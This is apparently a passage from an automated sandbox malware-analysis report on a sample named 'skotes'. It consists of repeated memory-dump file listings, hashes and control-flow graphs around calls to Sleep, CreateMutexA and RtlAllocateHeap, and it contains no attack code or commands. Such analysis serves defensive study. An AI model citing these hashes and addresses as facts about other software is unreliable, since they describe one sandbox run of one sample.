                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 158ad87b1f7be6c99f98f61250967b0b3b969987d8dd73819cb32526bf300c54
                                                                                                                                                                                                                                                                • Instruction ID: a259e59cbd34bccf6fa528f0a46f358b5aace1f1facd2882433f08bd7ebe1e57
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 158ad87b1f7be6c99f98f61250967b0b3b969987d8dd73819cb32526bf300c54
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30216B317142009BEB18AB7CEDC976EF7A9EFD2310F204229E414C72D6DB769981C751

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 306 aaa856-aaa86e 307 aaa89c-aaa89e 306->307 308 aaa870-aaa87c 306->308 311 aaa8a9-aaa8b1 call aa7d30 307->311 312 aaa8a0-aaa8a7 307->312 309 aaa87e-aaa88c 308->309 310 aaa892-aaa899 call abd663 308->310 309->310 313 aaa94e-aaa987 call ad6c6a Sleep CreateMutexA 309->313 310->307 321 aaa8b3-aaa8bb call aa7d30 311->321 322 aaa8e4-aaa8e6 311->322 315 aaa8eb-aaa916 call ab80c0 312->315 327 aaa98e-aaa994 313->327 321->322 328 aaa8bd-aaa8c5 call aa7d30 321->328 322->315 329 aaa996-aaa998 327->329 330 aaa9a7-aaa9a8 327->330 328->322 334 aaa8c7-aaa8cf call aa7d30 328->334 329->330 332 aaa99a-aaa9a5 329->332 332->330 334->322 338 aaa8d1-aaa8d9 call aa7d30 334->338 338->322 341 aaa8db-aaa8e2 338->341 341->315
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 3312769532b62c1739337158805fc3fd32ab1c1bad670b817d5a90f8b2e7e264
                                                                                                                                                                                                                                                                • Instruction ID: b3d068b53590b65bc8bc7541d0b1ed10b5373f3218faec8119a67340d7a937e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3312769532b62c1739337158805fc3fd32ab1c1bad670b817d5a90f8b2e7e264
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E213A312552009EEB346768DD9A77EB3D5DFA7700F240816E504972D2CF7E9981C693

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 283 aaa34f-aaa35b 284 aaa35d-aaa36b 283->284 285 aaa371-aaa39a call abd663 283->285 284->285 286 aaa93a 284->286 291 aaa3c8-aaa916 call ab80c0 285->291 292 aaa39c-aaa3a8 285->292 288 aaa953-aaa994 Sleep CreateMutexA 286->288 289 aaa93a call ad6c6a 286->289 298 aaa996-aaa998 288->298 299 aaa9a7-aaa9a8 288->299 289->288 293 aaa3aa-aaa3b8 292->293 294 aaa3be-aaa3c5 call abd663 292->294 293->286 293->294 294->291 298->299 302 aaa99a-aaa9a5 298->302 302->299
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: a03bbd3202b9bcd5c37b0524abab9b4343dcd0fb5fae2a2e8910b199252ae38b
                                                                                                                                                                                                                                                                • Instruction ID: efcef2009c5321a95e8a7acceb2f9e12f8903131aa30645229deba3c5a7be65e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a03bbd3202b9bcd5c37b0524abab9b4343dcd0fb5fae2a2e8910b199252ae38b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5219B323502009BEB189B6CDD897AEF7AADFE2310F204229E414DB3D1CB769580C362

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 342 add82f-add83a 343 add83c-add846 342->343 344 add848-add84e 342->344 343->344 345 add87c-add887 call ad75f6 343->345 346 add867-add878 RtlAllocateHeap 344->346 347 add850-add851 344->347 351 add889-add88b 345->351 349 add87a 346->349 350 add853-add85a call ad9dc0 346->350 347->346 349->351 350->345 355 add85c-add865 call ad8e36 350->355 355->345 355->346
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00ADA813,00000001,00000364,00000006,000000FF,?,00ADEE3F,?,00000004,00000000,?,?), ref: 00ADD870
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: b7e41f1e76aee2ac3b32d38299cd4c7308fd50015184d2e453e8cad67685287b
                                                                                                                                                                                                                                                                • Instruction ID: c59ef0bed9457bf8b57af6bee6511a6c91a20f1b2b8d7cc69a6d8fc9afd9ff5e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7e41f1e76aee2ac3b32d38299cd4c7308fd50015184d2e453e8cad67685287b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF02732A0512476EB233B72AD01A5F3B69DF81770F298023EC07A7391DE30DC00A6E0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
